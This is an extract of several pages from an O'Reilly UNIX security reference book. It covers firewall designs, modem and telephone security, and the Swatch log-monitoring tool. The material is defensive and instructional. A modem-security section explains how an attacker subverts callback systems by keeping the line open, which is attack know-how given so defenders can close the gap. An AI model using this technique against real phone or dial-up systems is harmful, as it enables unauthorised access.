
With this strategy, you describe the specific protocols that should be allowed to cross through the<br />

firewall, and the specific hosts that may pass data and be contacted. The rest are denied.<br />

There are advantages and disadvantages to both default permit and default deny. The primary advantage<br />

of default permit is that it is easier to configure: you simply block out the protocols that are "too<br />

dangerous," and rely on your awareness to block new dangerous protocols as they are developed (or<br />

discovered). With default deny, you simply enable protocols as they are requested by your users or<br />

management. Any protocol that isn't being used by your organization might as well be blocked.<br />

Neither default permit nor default deny is a panacea. With both policies, you can create a firewall that is<br />

either secure or unsecure, by permitting (or failing to deny) "dangerous" protocols.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (2 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

21.1.2 Uses of Firewalls<br />

Firewalls are part of a good defense in depth strategy. The idea is to place several layers of protection<br />

between your machines and the potential threats. There are some obvious threats from the outside, so you<br />

should naturally place a firewall between the outside and your internal network(s).<br />

Because a firewall is placed at the intersection of two networks, it can be used for many other purposes<br />

besides simply controlling access. For example:<br />

●<br />

●<br />

●<br />

●<br />

Firewalls can be used to block access to particular sites on the <strong>Internet</strong>, or to prevent certain users<br />

or machines from accessing certain servers or services.<br />

A firewall can be used to monitor communications between your internal network and an external<br />

network. For example, you could use the firewall to log the endpoints and amount of data sent over<br />

every TCP/IP connection between your organization and the outside world.<br />

A firewall can even be used to eavesdrop and record all communications between your internal<br />

network and the outside world. A 56KB leased line at 100% utilization passes only 605 MB/day,<br />

meaning that a week's worth of <strong>Internet</strong> traffic can easily fit on a single 8mm digital tape. Such<br />

records can be invaluable for tracking down network penetrations or detecting internal<br />

subversion.[1]<br />

[1] Such records also pose profound privacy questions, and possibly legal ones as<br />

well. Investigate these questions carefully before engaging in such monitoring.<br />

If your organization has more than one physical location and you have a firewall for each location,<br />

you can program the firewalls to automatically encrypt packets that are sent over the network<br />

between them. In this way, you can use the <strong>Internet</strong> as your own private wide area network (WAN)<br />

without compromising the data; this process is often referred to as creating a virtual private<br />

network, or VPN. (You will still be vulnerable to traffic analysis and denial of service attacks,<br />

however.)<br />

21.1.3 Anatomy of a Firewall<br />

Fundamentally, all firewalls consist of the following two kinds of components:[2]<br />

[2] The first edition of this book introduced this terminology as part of one of the first<br />

written descriptions of firewalls. Although not everyone in the community has adopted these<br />

terms, we believe that they are at least as descriptive as other terms invented since.<br />

Chokes<br />

Computer or communications devices that restrict the free flow of packets between networks.<br />

Chokes are often implemented with routers, but they do not have to be. The use of the word<br />

"choke" is taken from the field of electronics: a choke is a device that exhibits great resistance to<br />

certain types of signals, but not to others.<br />

Gates<br />

Specially designated programs, devices, or computers within the firewall's perimeter that receive<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (3 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

connections from external networks and handle them appropriately. Other texts on firewalls<br />

sometimes refer to single machines that handle all gate functions as bastion hosts.<br />

Ideally, users should not have accounts on a gate computer. This restriction helps improve the<br />

computer's reliability and users' security.<br />

On the gate(s), you may run one or more of the following kinds of programs:<br />

Network client software<br />

Client software includes programs such as telnet, ftp and mosaic. One of the simplest ways to give<br />

users limited access to the <strong>Internet</strong> is to allow them to log onto the gate machine and allow them to<br />

run network client software directly. This technique has the disadvantage that you must either<br />

create user accounts on the gate computer, or you must have users share a single account.<br />

Proxy server<br />

A proxy is a program that poses as another. In the case of a firewall, a proxy is a program that<br />

forwards a request through your firewall, from the internal network to the external one.<br />

Network servers<br />

You can also run network servers on your gate. For example, you might want to run an SMTP<br />

server such as sendmail or smap so that you can receive electronic mail. (If you wish to run an<br />

HTTP server to publish information on the World Wide Web, that server should be run on a<br />

separate computer, and not on your gate.)<br />

Many network servers can also function as proxies. They can do so because they implement simple<br />

store-and-forward models, allowing them to forward queries or messages that they cannot handle<br />

themselves. Some servers that can operate easily as proxies include SMTP (because email messages are<br />

automatically forwarded), NNTP (news is cached locally), NTP (time is maintained locally), and DNS<br />

(host addresses are locally cached). The following sections explore a variety of different kinds of firewall<br />

configurations in use today.<br />

21.1.4 Dual-ported Host: The First Firewalls<br />

The first <strong>Internet</strong> firewalls were <strong>UNIX</strong> computers equipped with two network ports: one for the internal<br />

network, and one for the external network (see Figure 21.1).<br />

Figure 21.1: Firewall built from a dual-ported host<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (4 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

In this configuration, the <strong>UNIX</strong> computer functions as both the choke and the gate. Services are provided<br />

to internal users in one of two ways:<br />

●<br />

●<br />

Users can log onto the dual-ported host directly (not a good idea, because users can then<br />

compromise the security of the firewall computer).<br />

The dual-ported host can run proxy servers for the individual services that you wish to pass across<br />

the firewall.<br />

To ensure that the computer functions as a choke, the computer must not forward packets from the<br />

external network to the internal network and vice versa. On most <strong>UNIX</strong> systems using Berkeley-derived<br />

TCP/IP, you can do so by setting the kernel variable ip_forwarding to 0.[3] Unfortunately, some <strong>UNIX</strong><br />

systems will still forward packets that have IP source-routing options set. Thus, you should carefully<br />

examine any dual-ported <strong>UNIX</strong> system that is used as a choke to make sure that it will not forward<br />

packets from one interface to another.<br />

[3] This setting is usually established with a SET in the /etc/system file under SVR4, or with<br />

a small shell and adb script under other systems. See your system documentation for details.<br />

On a Solaris machine, you can disable both IP forwarding and forwarding of source-routed packets by<br />

including the following commands in some start-up file (e.g., in the appropriate file in /etc/rc2.d):[4]<br />

[4] Be careful when you set these variables. The file /etc/init.d/netinit (linked to<br />

/etc/rc2.d/S69inet) also contains explicit settings of the ip_forward variable. To avoid<br />

having your values overwritten, comment out the system code in inet that sets ip_forward,<br />

and put your code in its place.<br />

ndd -set /dev/ip ip_forwarding 0<br />

ndd -set /dev/ip ip_forward_src_routed 0<br />

Note that under SunOS, you need to set ip_forwarding = 0 in the kernel configuration. If you don't, the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (5 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

kernel will still IP forward under some conditions even if you've set the ip_forwarding variable to 0.<br />

21.1.5 Packet Filtering: A Simple Firewall with Only a Choke<br />

A simple firewall can be built from a single choke (see Figure 21.2.) For example, some organizations<br />

use the packet filtering features available on some routers to block the TCP and UDP packets for certain<br />

kinds of services.<br />

Figure 21.2: Firewall built from a single choke<br />

Programming the choke is straightforward:<br />

●<br />

●<br />

●<br />

●<br />

Block all packets for services that are not used.<br />

Block all packets that explicitly set IP source-routing options.<br />

Allow incoming TCP connections to your predetermined network servers, but block all others.<br />

Optionally, allow computers within your organization's network to initiate outgoing TCP<br />

connections to any computer on the <strong>Internet</strong>.<br />

This is a simple configuration very popular on today's <strong>Internet</strong>. Many organizations use a single choke<br />

(usually a router) as a firewall for the entire organization.<br />

Packet filtering has a number of advantages:<br />

●<br />

●<br />

It is simple and cheap. Most organizations can build packet filters using routers that they already<br />

use to connect their networks to the <strong>Internet</strong>.<br />

Packet filtering is flexible. For example, if you discover that a person on a particular subnet, say<br />

204.17.191.0, is trying to break into your computer, you can simply block all access to your<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (6 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

network from that subnet. (Of course, this method will only work until the user at the subnet<br />

decides to launch an attack against you from another network or begins to forge IP addresses in the<br />

packets.)<br />

Packet filters have several disadvantages:<br />

●<br />

●<br />

●<br />

●<br />

Filters typically do not have very sophisticated systems for logging the amount of traffic that has<br />

crossed the firewall, logging break-in attempts, or giving different kinds of access to different<br />

users; however, some routers now include support for logging filter violations through the use of<br />

syslog.<br />

Filter rulesets can be very complex - so complex that you might not know if they are correct or<br />

not.<br />

There is no easy way to test filters except through direct experimentation, which may prove<br />

problematical in many situations.<br />

Packet filters do not handle the FTP protocol well because data transfers occur over<br />

high-numbered TCP ports; however, this problem can be alleviated by FTP clients that support the<br />

FTP passive mode.<br />

In addition to these disadvantages, there are several fundamental design weaknesses with packet filters:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

If the security of the router is compromised, then all hosts on the internal network are wide open to<br />

attack.<br />

You may not know if the security of the router is compromised because there is no simple way to<br />

test the router's configuration tables.<br />

Although the router may record the number of packets that are passed and blocked, it usually does<br />

not record other kinds of useful information.<br />

The router may allow remote administration. It may not alert you if somebody is repeatedly trying<br />

to guess its access password.<br />

The scheme can easily be defeated with minimal aid from a cooperative (or duped) insider.<br />

There is no protection against the contents of some connections, such as email or FTP transfer<br />

contents.<br />

21.1.6 One Choke, One Gate: Screened Host Architecture<br />

You can build a more secure firewall using a choke and a gate. The gate is a specially chosen computer<br />

on your network at which you run your mail server and any user proxy programs. (WWW servers and<br />

anonymous FTP servers should be run on separate computers, outside the firewall.) The choke can be a<br />

router with two interfaces. For example, a router with two Ethernet interfaces can partition one network<br />

from another. Alternatively, a router with an Ethernet and a high-speed interface can serve both as a gate<br />

and as an organization's connection with an off-site <strong>Internet</strong> service provider (ISP).[5] (See Figure 21.3.)<br />

[5] Many ISPs will, as a courtesy, maintain the router that connects your network to theirs.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (7 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

If you allow your ISP to maintain your router, then you should not use it as the basis for<br />

your firewall. Instead, you should have a second router behind the first router that is used<br />

only for security.<br />

Figure 21.3: Traditional firewall with a choke and a gate<br />

Programming is somewhat more complex in this arrangement.<br />

External choke:<br />

●<br />

●<br />

●<br />

●<br />

Gate:<br />

●<br />

●<br />

Block packets for services that you do not wish to cross your firewall.<br />

Block packets that have IP source routing, or that have other "unusual" options set (e.g.,<br />

record-route).<br />

Block packets that have your internal network as their destination.<br />

Only pass packets for which the source or destination IP address is the IP address of the gate.<br />

Runs server proxies to allow users on the inside network to use services on the external network.<br />

Either acts as a mail server, or receives mail from the external network and forwards it to a<br />

specially designed host on the internal network.<br />

With this configuration, the choke is configured so that it will only pass packets between the outside<br />

network and the gate. If any computer on your inside network wishes to communicate with the outside,<br />

the communication package must pass through a special "proxy" program running on the gate.[6] Users<br />

on the outside network must connect to the gate before bridging through to your internal network.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (8 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

[6] We describe one such set of proxies in Chapter 22, Wrappers and Proxies.<br />

21.1.7 Two Chokes and One Gate: Screened Subnet Architecture<br />

For a higher degree of security, some sites have implemented a firewall built from two chokes, as shown<br />

in Figure 21.4.<br />

Figure 21.4: . Firewall built from two chokes and one gate<br />

In this configuration, both the external choke and the gate are programmed as before. What's new is the<br />

addition of an internal choke. This second choke is a fail-safe: in the event that an attacker breaks into the<br />

gate and gains control over it, the internal choke prevents the attacker from using the gate to launch<br />

attacks against other computers inside the organization's network.<br />

Programming is similar to that of a single choke:<br />

External choke:<br />

●<br />

●<br />

●<br />

●<br />

Gate:<br />

Block packets for services that you do not wish to cross your firewall.<br />

Block packets that have IP source routing or that have other "unusual" options set.<br />

Block packets addressed to your internal network or your internal choke.<br />

Only pass packets for which the source or the destination IP address is that of the gate.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (9 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

●<br />

●<br />

Runs server proxies to allow users on the inside network to use services on the external network.<br />

Either acts as a mail server, or sends mail to a specially designed host on the internal network.<br />

Internal choke:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Block packets for services that you do not wish to cross your firewall.<br />

Block packets that have IP source routing or that have other "unusual" options set.<br />

Block packets addressed to the external choke.<br />

Pass packets for which the source or destination IP address is that of the gate, and for which the<br />

ports are for defined proxies on the gate.<br />

Block everything else.<br />

21.1.8 Multiple Gates<br />

Instead of using a single gate, you can use several gates - one for each protocol. This approach has the<br />

advantage of making the gates easier to administer. However, this approach also increases the number of<br />

machines that must be carefully watched for unusual activity. A simpler approach might be to have a<br />

single gate, but to create individual servers within your organization's network for specific services such<br />

as mail, Usenet, World Wide Web, and so forth.<br />

21.1.9 Internal Firewalls<br />

Instead of putting all your organization's machines on a single local network, you can separate your<br />

installation into sets of independent local area networks. These networks can communicate through<br />

gateway machines, routers, or full-blown firewalls. Alternatively, they can communicate with each other<br />

through independent links to the <strong>Internet</strong>, using an appropriate encryption system to prevent<br />

eavesdropping by your ISP and others.<br />

Internal firewalls make a lot of sense in a large organization. After all, there is no reason to allow your<br />

research scientists any privileged access to a computer that is used for accounting, or to allow people<br />

who are sitting in front of data-entry terminals to try their hand at breaking into the research and<br />

development department's file servers. With an internal firewall, you can place extra security where<br />

needed.<br />

The goal in setting up independent internal networks should be to minimize the damage that will take<br />

place if one of your internal networks is compromised, either by an intruder or, more likely, by an<br />

insider. By practicing stringent isolation, you can reduce the chances that an attacker will be able to use a<br />

foothold in one network as a beachhead for breaking into others.<br />

A firewall designed for use within an organization is very similar to one that is used to protect an<br />

organization against external threats. However, because the same management team and structure may be<br />

responsible for many networks within an organization, there is a great temptation to share information or<br />

services via an internal firewall, when such information services should in fact be blocked.<br />

Follow these basic guidelines when setting up independent internal networks:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (10 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

●<br />

●<br />

●<br />

●<br />

●<br />

If you use NIS, make sure that each local area network has its own server. Make sure that each<br />

server and its clients have their own netgroup domain.<br />

Don't let any server or workstation on one network trust hosts on any other network or any<br />

gateway machine. (For an explanation of trusted hosts, see "Trusted hosts and users" in Chapter<br />

17, TCP/IP Services.)<br />

Make certain that users who have accounts on more than one local network have different<br />

passwords for each subnet. If possible, use a one-time password scheme or token-based system.<br />

Enable the highest level of logging for the gateways, and the most restrictive security possible. If<br />

possible, do not allow user accounts on the gateway machines.<br />

Do not NFS-mount filesystems from one LAN onto another LAN. If you absolutely must share a<br />

partition, be sure that it is exported read-only.<br />

Internal firewall machines have many benefits:<br />

●<br />

●<br />

●<br />

●<br />

They help isolate physical failure of the network to a smaller number of machines.<br />

They limit the number of machines putting information on any physical segment of the network,<br />

thus limiting the damage that can be done by eavesdropping.<br />

They limit the number of machines that will be affected by flooding attacks.<br />

They create barriers for attackers, both external and internal, who are trying to attack specific<br />

machines at a particular installation.<br />

Remember: Although most people spend considerable time and money protecting against attacks from<br />

outsiders, dishonest and disgruntled employees are in a position to do much more damage to your<br />

organization. Properly configured internal firewalls help limit the amount of damage that an insider can<br />

do.<br />

In the following text, we'll refer to internal networks and external networks when describing a firewall,<br />

with the understanding that both networks may in fact be internal to your organization.<br />

V. Advanced Topics 21.2 Building Your Own<br />

Firewall<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (11 of 11) [2002-04-12 10:45:09]


[Chapter 14] Telephone <strong>Sec</strong>urity<br />

Chapter 14<br />

14. Telephone <strong>Sec</strong>urity<br />

Contents:<br />

Modems: Theory of Operation<br />

Serial Interfaces<br />

The RS-232 Serial Protocol<br />

Modems and <strong>Sec</strong>urity<br />

Modems and <strong>UNIX</strong><br />

Additional <strong>Sec</strong>urity for Modems<br />

A main function of modern computers is to enable communications - sending electronic mail, news<br />

bulletins, and documents across the office or around the world. After all, a computer by itself is really<br />

nothing more than an overgrown programmable calculator - a word processor with delusions of grandeur.<br />

But with a modem or a network interface, computers can "speak" and send information.<br />

A good communications infrastructure works both ways: not only does it let you get information out, it<br />

also lets you get back in to your computer when you're at home or out of town. If your computer is<br />

equipped with a modem that answers incoming telephone calls, you can dial up when you're sick or on<br />

vacation and read your electronic mail, keep informed with your online news services, or even work on a<br />

financial projection if the whim suddenly strikes you. You can almost believe that you never left the<br />

office in the first place!<br />

But in the world of computer security, good communications can be a double-edged sword.<br />

Communications equipment can aid attackers and saboteurs while it enables you to get information in<br />

and out easily. As with most areas of computer security, the way to protect yourself is not to shun the<br />

technology, but to embrace it carefully, making sure that it can't be turned against you.<br />

14.1 Modems: Theory of Operation<br />

Modems are devices that let computers transmit information over ordinary telephone lines. The word<br />

explains how the device works: modem is an acronym for "modulator/demodulator." Modems translate a<br />

stream of information into a series of tones (modulating) at one end of the telephone line, and translate<br />

the tones back into the serial stream at the other end of the connection (demodulating). Most modems are<br />

bidirectional - every modem contains both a modulator and a demodulator, so a data transfer can take<br />

place in both directions simultaneously.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_01.htm (1 of 2) [2002-04-12 10:45:10]


[Chapter 14] Telephone <strong>Sec</strong>urity<br />

Modems have a flexibility that is unparalleled by other communications technologies. Because modems<br />

work with standard telephone lines, and use the public telephone network to route their conversations,<br />

any computer that is equipped with a modem and a telephone line can communicate with any other<br />

computer that has a modem and a telephone line, anywhere in the world. Thus, even in this age of the<br />

<strong>Internet</strong> and local area networks, modems are still the single most common way that people access<br />

computers remotely. This trend is likely to continue into at least the near future, especially with the<br />

continuing popularity of specialized dial bulletin board systems (BBSS).<br />

Early computer modems commonly operated at 110 or 300 baud, transmitting information at a rate of 10<br />

or 30 characters per second, respectively. Today, in 1996, few computer modems are sold that are not<br />

capable of 14,400 bits per second (bps), and modems that zip along at 28,800 bps are increasingly<br />

popular. Some modems that send data synchronously, with a precision clock, are capable of rates in<br />

excess of 100,000 bps. Special modems on digital ISDN lines are also capable of speeds in excess of<br />

100,000 bps. With data compression included, and new technology constantly being offered, we expect<br />

to see common modems with increasingly higher speeds (and smaller physical sizes) as time goes on.<br />

Baud and bps<br />

Baud is named after the 19th-century French inventor, J. M. E. Baudot. He invented a method of<br />

encoding letters and digits into bit patterns for transmission. A 5-bit descendent of his code is still used in<br />

today's TELEX systems.<br />

5 to 12 bits are required to transmit a "standard" character, depending on whether we make upper/lower<br />

case available, transmit check-bits, and so on. A multi-byte character code may require many times that<br />

for each character. The standard ISO 8859-1 character set requires eight bits per character, and simple<br />

ASCII requires seven bits. Computer data transmitted over a serial line usually consists of one start bit,<br />

seven or eight data bits, one parity or space bit, and one stop bit. The number of characters per second is<br />

thus usually equal to the number of bits per second divided by 10.<br />

The word "baud[1]" refers to the number of audible tokens per second that are sent over the telephone<br />

line. On 110- and 300-bits-per-second (bps) modems, the baud rate equals the bps rate. On 1200-, 2400-,<br />

and higher-bps modems, a variety of audible encoding techniques are used to cram more information into<br />

each audible token. TDD phone devices for the deaf use a lower-speed modem than modern computers<br />

usually do.<br />

[1] The "baud" is not to be confused with the "bawd," which is the rate at which juveniles<br />

transmit risqué pictures over network connections.<br />

IV. Network and <strong>Internet</strong><br />

<strong>Sec</strong>urity<br />

14.2 Serial Interfaces<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_01.htm (2 of 2) [2002-04-12 10:45:10]


[Chapter 10] 10.6 Swatch: A Log File Tool<br />

Chapter 10<br />

Auditing and Logging<br />

10.6 Swatch: A Log File Tool<br />

Swatch is a simple program written in the Perl programming language that is designed to monitor log files.<br />

It allows you to automatically scan log files for particular entries and then take appropriate action, such as<br />

sending you mail, printing a message on your screen, or running a program. There are a few other similar<br />

tools available, and we hope that more might be written in the near future, but we'll explain Swatch here as<br />

an example of how to automate monitoring of your log files. Swatch allows a great deal of flexibility,<br />

although it offers no debugging facility for complicated configuration and it has a temperamental<br />

configuration file syntax.<br />

Swatch was developed by E. Todd Atkins at Stanford's EE Computer Facility to automatically scan log<br />

files. Swatch is not currently included as standard software with any <strong>UNIX</strong> distribution, but it is available<br />

via anonymous FTP from ftp://sierra.stanford.edu/swatch or ftp://coast.cs.purdue.edu/pub/tools/swatch.<br />

10.6.1 Running Swatch<br />

Swatch has two modes of operation. It can be run in batch, scanning a log file according to a preset<br />

configuration. Alternatively, Swatch can monitor your log files in real time, looking at lines as they are<br />

added.<br />

Swatch is run from the command line:<br />

% swatch options input-source<br />

The following are the ones that you will most likely use when running Swatch:<br />

-c config_file<br />

Specifies a configuration file to use. By default, Swatch uses the file ~/.swatchrc, which probably<br />

isn't what you want to use. (You will probably want to use different configuration files for different<br />

log files.)<br />

-r restart_time<br />

Allows you to tell Swatch to restart itself after a certain amount of time. Time may be in the form<br />

hh:mm[am|pm] to specify an absolute time, or in the form +hh:mm, meaning a time hh hours and<br />

mm minutes in the future.<br />

The Swatch options given below allow you to change the separator that the program uses when interpreting<br />

its files. They are probably of limited use in most applications:<br />

-P pattern_separator<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_06.htm (1 of 4) [2002-04-12 10:45:10]


[Chapter 10] 10.6 Swatch: A Log File Tool<br />

Specifies the separator that Swatch uses when parsing the patterns in configuration file. By default,<br />

Swatch uses the comma (,) as the separator.<br />

-A action_separator<br />

Specifies the separator that Swatch will use when parsing the actions in the configuration file. By<br />

default, Swatch uses the comma (,) as the separator.<br />

-I input_separator<br />

Specifies the separator that Swatch will use to separate each input record of the input file. By default,<br />

Swatch uses the newline.<br />

The input source is specified by one of the following arguments:<br />

-f filename<br />

Specifies a file for Swatch to examine. Swatch will do a single pass through the file.<br />

-p program<br />

Specifies a program for Swatch to run and examine the results.<br />

-t filename<br />

Specifies a file for Swatch to examine on a continual basis. Swatch will examine each line of text as<br />

it is added.<br />

10.6.2 The Swatch Configuration File<br />

Swatch's operation is controlled by a configuration file. Each line of the file consists of four tab-delimited<br />

fields, and has the form:<br />

/pattern/[,/pattern/,...] action[,action,...] [[[HH:]MM:]SS]<br />

[start:length]<br />

The first field specifies a pattern which is scanned for on each line of the log file. The pattern is in the form<br />

of a Perl regular expression, which is similar to regular expressions used by egrep. If more than one pattern<br />

is specified, then a match on either pattern will signify a match.<br />

The second field specifies an action to be taken each time the pattern in the first field is matched. Swatch<br />

supports the following actions:<br />

echo[=mode]<br />

Prints the matched line. You can specify an optional mode, which may be either normal, bold,<br />

underscore, blink, or inverse.<br />

bell[=N]<br />

Prints the matched line and rings the bell. You can specify a number N to cause the bell to ring N<br />

times.<br />

exec=command<br />

Executes the specified command. If you specify $0 or $* in the configuration file, the symbol will be<br />

replaced by the entire line from the log file. If you specify $1, $2 or $N, the symbol will be replaced<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_06.htm (2 of 4) [2002-04-12 10:45:10]


[Chapter 10] 10.6 Swatch: A Log File Tool<br />

by the Nth field from the log file line.<br />

system=command<br />

Similar to the exec= action, except that Swatch will not process additional lines from the log file until<br />

the command has finished executing.<br />

ignore<br />

Ignores the matched line.<br />

mail[=address:address:...]<br />

Sends electronic mail to the specified address containing the matched line. If no address is specified,<br />

the mail will be sent to the user who is running the program.<br />

pipe=command<br />

Pipes the matched lines into the specified command.<br />

write[=user:user:...]<br />

Writes the matched lines on the user's terminal with the write command.<br />

The third and fourth fields are optional. They give you a technique for controlling identical lines which are<br />

sent to the log file. If you specify a time, then Swatch will not alert you for identical lines which are sent to<br />

the log file within the specified period of time. Instead, Swatch will merely notify you when the first line is<br />

triggered, and then after the specified period of time has passed. The fourth field specifies the location<br />

within the log file where the timestamp takes place.<br />

For example, on one system, you may have a process which generates the following message repeatedly in<br />

the log file:<br />

Apr 3 01:01:00 next routed[9055]: bind: Bad file number<br />

Apr 3 02:01:00 next routed[9135]: bind: Bad file number<br />

Apr 3 03:01:00 next routed[9198]: bind: Bad file number<br />

Apr 3 04:01:00 next routed[9273]: bind: Bad file number<br />

You can catch the log file message with the following Swatch configuration line:<br />

/routed.*bind/ echo 24:00:00 0:16<br />

This line should cause Swatch to report the routedmessage only once a day, with the following message:<br />

*** The following was seen 20 times in the last 24 hours(s):<br />

==> next routed[9273]: bind: Bad file number<br />

Be sure that you use the tab character to separate the fields in your configuration file. If you use spaces, you<br />

may get an error message like this:<br />

parse error in file /tmp/..swatch..2097 at line 24, next 2 tokens<br />

"/routed.*bind<br />

/ echo"<br />

parse error in file /tmp/..swatch..2097 at line 27, next token "}"<br />

Execution of /tmp/..swatch..2097 aborted due to compilation errors.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_06.htm (3 of 4) [2002-04-12 10:45:10]


[Chapter 10] 10.6 Swatch: A Log File Tool<br />

10.5 The <strong>UNIX</strong> System Log<br />

(syslog) Facility<br />

10.7 Handwritten Logs<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_06.htm (4 of 4) [2002-04-12 10:45:10]


[Chapter 14] 14.4 Modems and <strong>Sec</strong>urity<br />

Chapter 14<br />

Telephone <strong>Sec</strong>urity<br />

14.4 Modems and <strong>Sec</strong>urity<br />

Modems raise a number of security concerns because they create links between your computer and the<br />

outside world. Modems can be used by individuals inside your organization to remove confidential<br />

information. Modems can be used by people outside your organization to gain unauthorized access to<br />

your computer. If your modems can be reprogrammed or otherwise subverted, they can be used to trick<br />

your users into revealing their passwords. And, finally, an attacker can eavesdrop on a modem<br />

communication.<br />

Today, modems remain a popular tool for breaking into large corporate networks. The reason is simple:<br />

while corporations closely monitor their network connections, modems are largely unguarded. In many<br />

organizations, there is no good way to prevent users from putting modems on their desktop computers<br />

and running "remote access" software.<br />

So what can be done? To maximize security, modems should be provided by the organization and<br />

administered in a secure fashion.<br />

The first step is to protect the modems themselves. Be sure they are located in a physically secure<br />

location, so that no unauthorized individual can access them. This protection is to prevent the modems<br />

from being altered or rewired. Some modems can have altered microcode or passwords loaded into them<br />

by someone with appropriate access, and you want to prevent such occurrences. You might make a note<br />

of the configuration switches (if any) on the modem, and periodically check them to be certain they<br />

remain unchanged.<br />

Many modems sold these days allow remote configuration and testing. This capability makes changes<br />

simpler for personnel who manage several remote locations. It also makes abusing your modems simpler<br />

for an attacker. Therefore, be certain that such features, if present in your modems, are disabled.<br />

The next most important aspect of protecting your modems is to protect their telephone numbers. Treat<br />

the telephone numbers for your modems the same as you treat your passwords: don't publicize them to<br />

anyone other than those who have a need to know. Making the telephone numbers for your modems<br />

widely known increases the chances that somebody might try to use them to break into your system.<br />

We'll describe some approaches in later sections.<br />

Unfortunately, you cannot keep the telephone numbers of your modems absolutely secret. After all,<br />

people do need to call them. And even if you were extremely careful with the numbers, an attacker could<br />

always discover the modem numbers by dialing every telephone number in your exchange. For this<br />

reason, simple secrecy isn't a solution; your modems need more stringent protection.[2]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_04.htm (1 of 6) [2002-04-12 10:45:11]


[Chapter 14] 14.4 Modems and <strong>Sec</strong>urity<br />

[2] You might think about changing your modem phone numbers on a yearly basis as a<br />

basic precaution.<br />

14.4.1 One-Way Phone Lines<br />

Most sites set up their modems and telephone lines so that they can both initiate and receive calls. Under<br />

older versions of <strong>UNIX</strong>, you could not use a modem for both purposes. Many vendors developed their<br />

own mechanisms to allow modems to be used bidirectionally.<br />

Having modems be able to initiate and receive calls may seem like an economical way to make the most<br />

use of your modems and phone lines. However, the feature introduces a variety of significant security<br />

risks:<br />

●<br />

●<br />

●<br />

Toll fraud can only be committed on telephone lines that can place outgoing calls. The more<br />

phones you have that can place such calls, the more time and effort you will need to spend to make<br />

sure that your outbound modem lines are properly configured.<br />

If phone lines can be used for either inbound or outbound calls, then you run the risk that your<br />

inbound callers will use up all of your phone lines and prevent anybody on your system from<br />

initiating an outgoing call. (You also run the risk that all of your outbound lines may prevent<br />

people from dialing into your system.) By forcing telephones to be used for either inbound or<br />

outbound calls, you assure that one use of the system will not preclude the other.<br />

If your modems are used for both inbound and outbound calls, an attacker can use this capability<br />

to subvert any callback systems (see the sidebar) that you may be employing.<br />

Your system will therefore be more secure if you use separate modems for inbound and outbound traffic.<br />

You may further wish to routinely monitor the configuration of your telephone lines to check for the<br />

following conditions:<br />

●<br />

●<br />

14.4.2<br />

Check to make sure that telephone lines used only for inbound calls cannot place outbound calls.<br />

Check to make sure that telephone lines that are not used to call long-distance telephone numbers<br />

in fact cannot place long-distance telephone calls.<br />

Subverting Callback<br />

A callback scheme is one in which an outsider calls your machine, connects to the software, and provides<br />

some form of identification. The system then severs the connection and calls the outsider back at a<br />

predetermined phone number. This scheme enhances security because the system will dial only<br />

preauthorized numbers, so an attacker cannot get the system to initiate a connection to his or her modem.<br />

Unfortunately, callback can be subverted if the same modem that the outsider called is used to call the<br />

user back. Many phone systems, and especially some PBX systems, will not disconnect a call initiated<br />

from an outside line until the outside line is hung up.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_04.htm (2 of 6) [2002-04-12 10:45:11]


[Chapter 14] 14.4 Modems and <strong>Sec</strong>urity<br />

To subvert such a callback system, the attacker merely calls the "callback modem" and then does not<br />

hang up when the modem attempts to sever the connection. The modem tries to hang up, then picks the<br />

phone back up and tries to dial out. The attacker's modem is then set to answer the callback modem, and<br />

the system is subverted. This type of attack can also be performed on systems that are not using a<br />

callback, but are doing normal dialout operations. For example, the attack can be used to intercept<br />

messages that are sent over a UUCP connection; the attacker merely configures a computer system to<br />

have the same name and UUCP login account as the system that is being called.<br />

